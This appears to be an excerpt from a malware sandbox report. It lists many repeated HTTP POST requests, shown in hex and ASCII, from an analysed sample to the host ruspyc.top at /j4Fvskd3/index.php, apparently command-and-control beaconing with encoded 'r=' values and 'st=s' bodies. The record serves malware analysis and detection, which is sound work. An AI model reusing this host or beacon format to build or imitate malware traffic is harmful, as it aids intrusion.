Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
